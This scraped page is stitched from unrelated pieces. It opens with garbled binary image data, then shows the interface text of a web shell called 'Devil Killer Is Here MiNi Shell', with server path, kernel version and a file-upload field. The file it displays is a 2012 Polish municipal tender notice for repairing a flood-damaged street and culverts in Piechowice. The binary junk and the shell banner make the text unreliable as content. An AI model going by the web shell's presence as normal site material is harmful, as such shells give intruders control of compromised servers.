JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120807/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120807/289466-N-2012.html

<p class="kh_header"><b>Piechowice: Remont  ulicy Górnej w Piechowicach o długości 150, kilometraż od 0+058 do 0+208  oraz remont  przepustów w ilości 5szt. o średnicy 60 cm. Znak sprawy IZP.271.1.4.2012</b><br>
<b>Numer ogłoszenia: 289466 - 2012; data zamieszczenia: 07.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Piechowice , ul. Żymierskiego 49, 58-573 Piechowice, woj. dolnośląskie, tel. 075 7548900, faks 075 7612274.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://piechowice.bip.pbox.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont  ulicy Górnej w Piechowicach o długości 150, kilometraż od 0+058 do 0+208  oraz remont  przepustów w ilości 5szt. o średnicy 60 cm. Znak sprawy IZP.271.1.4.2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie robót budowlanych dla zamówienia pn. : Remont  ulicy Górnej w Piechowicach o długości 150, kilometraż od 0+058 do 0+208  oraz remont  przepustów w ilo-ści 5szt. o średnicy 60 cm,

które opisane jest kodem wg. Wspólnego Słownika Zamówień CPV jako:

CPV 45 00 00 00 - 7 Roboty budowlane,
CPV 45 10 00 00 - 8 Przygotowanie terenu pod budowę,
CPV 45 20 00 00  - 9 Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich 
                               części oraz roboty w zakresie inżynierii lądowej i wodnej,
CPV 45 22 00 00 - 5 Roboty inżynieryjne i budowlane
CPV 45 23 31 20-6  Roboty w zakresie budowy dróg


2.	Zamówienie pn.Remont  ulicy Górnej w Piechowicach o długości 150, kilometraż od 0+058 do 0+208  oraz remont  przepustów w ilości 5szt. o średnicy 60 cm
i obejmuje odbudowę zniszczeń spowodowanych powodzią w 2010 r.

Nawalne opady (powódź ) w 2010 r. znacznie  uszkodziły konstrukcję drogi - ulicy Górnej. Zniszczona jest warstwa  bitumiczna, wypłukane znaczne fragmenty podbudowy. Jezdnia wymaga rozbiórki i wymiany na nową nawierzchnię.
Długość remontowanego odcinka drogi  150 mb,
Do wykonania:
- rozbiórka istniejącej zniszczonej nawierzchni z asfaltobetonu gr. 3 cm oraz podbudowy z kruszywa gr 15 cm 
   - z powierzchni 458 m2,
- rozbiórka istniejących zniszczonych przepustów z wydobyciem rur -20 mb, 
oraz wykonanie nowej  nawierzchni jezdni o szerokości 3,0 m o następującej konstrukcji:
-	podbudowa z kruszywa 0-63 mm gr.20 cm
-	warstwa wiążąca  i ścieralna z asfaltobetonu  o  grub.  po  5 cm
Wzdłuż krawędzi drogi od strony zabudowań do wykonania prefabrykowany ściek betonowy na podsypce cementowo-piaskowej 1:4- o całkowitej długości 144 mb. W rejonie wjazdów na posesje do budynków nr 19,20, 21 wykonać ściek brukowany o łącznej długości 22 m z kostki brukowej kamiennej o wysokości 10 cm.
Należy wymienić 4 istniejące przepusty na nowe a w jednym wymienić zniszczoną komorę wlotową poprzez wykonanie nowej studzienki prostokątnej:
- przepust nr 1 - z rur dwuściennych karbowanych PEHD, dn 600 mm o długości 6,96 m,  
- przepust nr 2 i nr 3 - z rur dwuściennych karbowanych PEHD, dn 600 mm o długości 6,06 m, 
- przepust nr 4 - wymienić zniszczoną komorę wlotową poprzez wykonanie nowej studzienki prostokątnej,
- przepust nr 5  - z rur dwuściennych karbowanych PEHD, dn 600 mm o długości 6,30 m, 
Przy przepustach należy wykonać balustrady ochronne i pozostałe roboty np. roboty ziemne wg  dokumentacji projektowej.

3.	Integralną częścią opisu przedmiotu zamówienia jest dokumentacja projektowa i Specyfikacje Wykonania i Odbioru Robót Budowlanych (tzw. STWiORB)  zgodnie z załącznikiem nr 6 do Specyfikacji Istotnych Warunków Zamówienia tzw. SIWZ tj.: 

4.	W szczególności Wykonawca zapewni wykonanie i uwzględni w cenie oferty:
- Wykonawca zapewni minimum 36 miesięczną gwarancję jakości na całość wykonanego zamówienia,
- Wykonawca wykona, uzgodni i zatwierdzi tymczasową organizację ruchu - jeżeli dla wykonania robót będzie konieczne zajęcie pasa drogowego
  Organizację ruchu należy wykonać zgodnie z przepisami rozporządzenia Ministra Infrastruktury z dnia   23.09.2003 r. w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzaniem Dz.U. Nr  177/2003, poz. 1729.
- dokumentację powykonawczą w 2 egz.
- jeżeli będzie konieczne - zapewni i pokryje koszty nadzorów ze strony instytucji branżowych dla sieci i urządzeń wodociągowych,  gazowych, energetycznych,
- zorganizuje i utrzyma plac budowy w czasie prowadzenia robót i jego likwidację po zakończeniu robót,
- przekazanie i odbiór placu budowy dla/od Wykonawcy nastąpi na podstawie stosownych pisemnych protokołów.
- obowiązki Wykonawcy zawarte w Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych (tzw. STWiORB) oraz we wzorze (projekcie) umowy stanowiącym załącznik nr 5 do SIWZ.

5.	W każdym przypadku użycia w jakimkolwiek miejscu do opisu przedmiotu zamówienia w Dokumentacji projektowej lub STWiORB znaków, nazw towarowych, pochodzenia, o których mowa w art. 29 ust. 3 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity Dz.U. z 2010 r. Nr 113, poz. 759 wraz z późniejszymi zmianami) zwana też ustawą lub  PZP Zamawiający informuje, że dopuszcza rozwiązania równoważne opisywanym.
Zgodnie z art. 30 ust. 5 ustawy PZP Wykonawca, który powołuje się na rozwiązania równoważne jest 
zobowiązany  wykazać, że oferowane przez niego wyroby materiały, roboty budowlane spełniają wymagania techniczne opisane w niniejszym Opisie przedmiotu zamówienia, Dokumentacji projektowej i STWiORB.

6.	TERMIN WYKONANIA CAŁOŚCI  ZAMÓWIENIA. 
Termin wykonania całości zamówienia: 
- rozpoczęcie - od dnia następnego po podpisaniu umowy. Podpisanie umowy uzależnione jest od zakończenia procedury przetargowej. Przewiduje się, że podpisanie umowy nastąpi pod koniec sierpnia 2012 r.
- zakończenie - najpóźniej  do 14 grudnia 2012 r.
Za termin zakończenia uważa się datę podpisania protokołu odbioru końcowego. 
Przy czym termin zgłoszenia gotowości do odbioru końcowego - nie później niż do 30 listopada 2012 r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.20.00.00-9, 45.22.00.00-5, 45.23.31.20-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 4.000,00 zł (słownie złotych: cztery tysiące 00/100),
2.	Forma wadium.
1)	Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
   a)   pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr z 2007 Nr 42, poz. 275).
2)	W przypadku złożenia przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielającej gwarancji oraz wskazanie ich siedzib,
b) określenie wierzytelności, która ma być zabezpieczona gwarancją, 
c)	kwotę gwarancji,
d)  termin ważności gwarancji,
e) zobowiązanie gwaranta do bezwarunkowego zapłacenia kwoty gwarancji na 
     pierwsze pisemne żądanie Zamawiającego zawierające oświadczenia:
- że Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 ustawy PZP, nie złożył   
     dokumentów lub oświadczeń, o których mowa w art. 25 ust.1 ustawy PZP, lub 
     pełnomocnictw, a nie udowodnił, że wynikało to z przyczyn nieleżących po jego 
    stronie,

f)	zobowiązanie gwaranta do bezwarunkowego zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano: 
-	odmówił podpisania umowy na warunkach określonych w ofercie, lub
-	nie wniósł zabezpieczenia należytego wykonania umowy, lub
-	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
          
    3) Postanowienia podpunktu 2) stosuje się odpowiednio do poręczeń, określonych powyżej 
          w podpunktach: 1) b) oraz 1) e).
 
3.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.	Wadium w pieniądzu należy wnieść wyłącznie przelewem  na rachunek bankowy Zamawiającego:
Bank Gospodarki Żywnościowej S.A.       Oddział w Jeleniej Górze   
            Nr 65 2030 0045 1110 0000 0080 3550
z adnotacją na tytule wpłaty: wadium - IZP.271.1.4.2012 - Przetarg: Remont ulicy Górnej. 
        

5.	W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty wadium na rachunku Zamawiającego. 
6.	W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał takiego dokumentu należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego w  pok. 11 (Referat Finansowy I piętro). Jeżeli Wykonawca prześle ofertę pocztą winien kopię dowodu wniesienia wadium załączyć do oferty, natomiast oryginał dokumentu wadialnego umieścić w odrębnej kopercie oznaczonej -oryginał dowodu wniesienia wadium.
7.	Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy, a jego oferta zostanie uznana za odrzuconą na podstawie art. 24 ust. 4 ustawy.
8.	Zamawiający zwraca wadium wszystkim Wykonawcom  niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt 11.
9.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wyko-nania umowy, jeżeli jego wniesienia żądano.
10.	Zamawiający zwraca  niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
11.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy PZP, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, iż wynikało to z przyczyn nieleżących po jego stronie.
UWAGA: W przypadku wadium w formie gwarancji lub poręczenia, dokument ten winien zawierać klauzulę gwarancji zapłaty wymaganej kwoty wadium po zaistnieniu w/w okoliczności - patrz punkt 2 ppkt 2) lit. e oraz f i  ookt 3).

12.	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium zgodnie z punktem 8, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
13.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy.
14.	Wadium wraz z odsetkami wniesione w pieniądzu przez Wykonawcę, którego oferta została uznana za najko-rzystniejszą, na wniosek tego Wykonawcy, zaliczane jest przez Zamawiającego na poczet zabezpieczenia należytego wykonania umowy.
15.	Wykonawca, którego oferta została wybrana, traci wadium wraz z odsetkami na rzecz Zamawiającego w przypadku, gdy:
a) odmówił podpisania umowy na warunkach określonych w ofercie,
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c)	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
16.	UWAGA: Wadium wniesione w formie gwarancji i poręczeń musi obejmować wszystkie przypadki, w których Wykonawca traci wadium na rzecz Zamawiającego. W przypadku, gdy dokumenty te nie będą zabezpieczały w pełnym zakresie możliwych roszczeń Zamawiającego, określonych ustawą PZP - Wykonawca zostanie wykluczony z postępowania.
17.	Wadium w formie gwarancji lub poręczeń nie podlega przeniesieniu na osoby trzecie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych szczególnych warunków; uzna warunek za spełniony, gdy Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 PZP</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku posiadania niezbędnego doświadczenia Zamawiający uzna wykonanie w okresie ostatnich 5 lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) przed upływem terminu składania ofert min. 2 roboty (zadania) w zakresie budowy i/lub przebudowy i/lub odbudowy i/lub remontu i/lub nawierzchni  jezdni, parkingów, chodników, placów postojowych itp. z asfaltobetonu, o wartości brutto minimum 75.000,00 zł każde zadanie, lub jednego zadania w powyższym zakresie o wartości brutto minimum 150.000,00 zł, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że te roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Sprawdzenie ww. warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych szczególnych warunków; uzna warunek za spełniony, gdy Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 PZP</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych szczególnych warunków; uzna warunek za spełniony, gdy Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 PZP</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych szczególnych warunków; uzna warunek za spełniony, gdy Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 PZP</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>jeżeli dotyczy - Zgodnie z art. 26 ust. 2b ustawy PZP Wykonawca w celu wykazania spełnienia warunków udziału w postępowaniu może polegać na wiedzy i doświadczeniu, potencjale technicz-nym, osobach zdolnych do wykonania niniejszego zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne (w oryginale) zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, 
na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia. 
1.1. Zmiana terminu realizacji przedmiotu umowy: 
a)	warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych i usług, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów, w szczególności: temperatury powietrza poniżej -5 st. C, wiatr uniemożliwiający pracę maszyn budowlanych, gwałtowne opady deszczu (oberwanie chmury), klęski żywiołowe np. powódź, gradobicie, burze z wyładowaniami atmosferycznymi, itp.;
b)	zdarzenie zewnętrzne niemożliwe do przewidzenia i do zapobieżenia uniemożliwiające wykonanie umowy zgodnie z SIWZ, na przykład kataklizmy, awarie urządzeń wywołane przez czynniki atmosfe-ryczne lub zewnętrzne, które będą miały wpływ na treść zawartej umowy i termin realizacji,
c)	konieczność zmiany umowy w związku z potrzebą udzielenia zamówień dodatkowych w trybie zgod-nym z  przepisami ustawy prawo zamówień publicznych, 
d)	zmiany będące następstwem działania organów administracji, w szczególności:
      d.1)  przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji 
               decyzji, zezwoleń, uzgodnień itp.;
       d.2)  odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń; 
e)	zmiany przepisów powodujących konieczność innych rozwiązań niż zakładano w opisie przedmiotu zamówienia,
f)	zmiany przepisów powodujących konieczność uzyskania dokumentów, które te przepisy narzucają.
1.2.	 Podwykonawstwo: rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wyko-nawcy np. gdy wynika z okoliczności niezależnych od Wykonawcy np. całkowite zniszczenie sprzętu siłą wyższą lub jego kradzież.
1.3. Wprowadzeniu robót zamiennych podczas realizacji umowy wynikających z rzeczywistych warunków wystę-pujących w trakcie realizacji prac - nie powodujących zmian w wysokości ceny umownej wpisanej do umowy.
1.4. Pozostałe zmiany: 
a)	zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian 
zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu;
b)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami,
c)	zmiana formy zabezpieczenia należytego wykonania umowy zgodnie z art. 149 PZP,
d)	zmiany uzasadnione okolicznościami, o których mowa w art. 3571 Kodeksu Cywilnego.
e)	zmiana nazwy zadania.

1.4. Zmiany umowy nie wymaga: zmiana danych teleadresowych, zmiana danych związanych z obsługą admini-stracyjno-organizacyjną umowy, zmiana  osób wskazanych do kontaktów miedzy stronami umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://piechowice.bip.pbox.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamawiającego tj. Urząd Miasta Piechowice, 58-573 Piechowice, ul.Żymierskiego 49, pok. nr 14, II piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.08.2012 godzina 09:00, miejsce: W siedzibie Zamawiającego tj. w Urzędzie Miasta Piechowice,58-573 Piechowice ul. Żymierskiego 49, pok. nr 6 -Sekretariat - I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




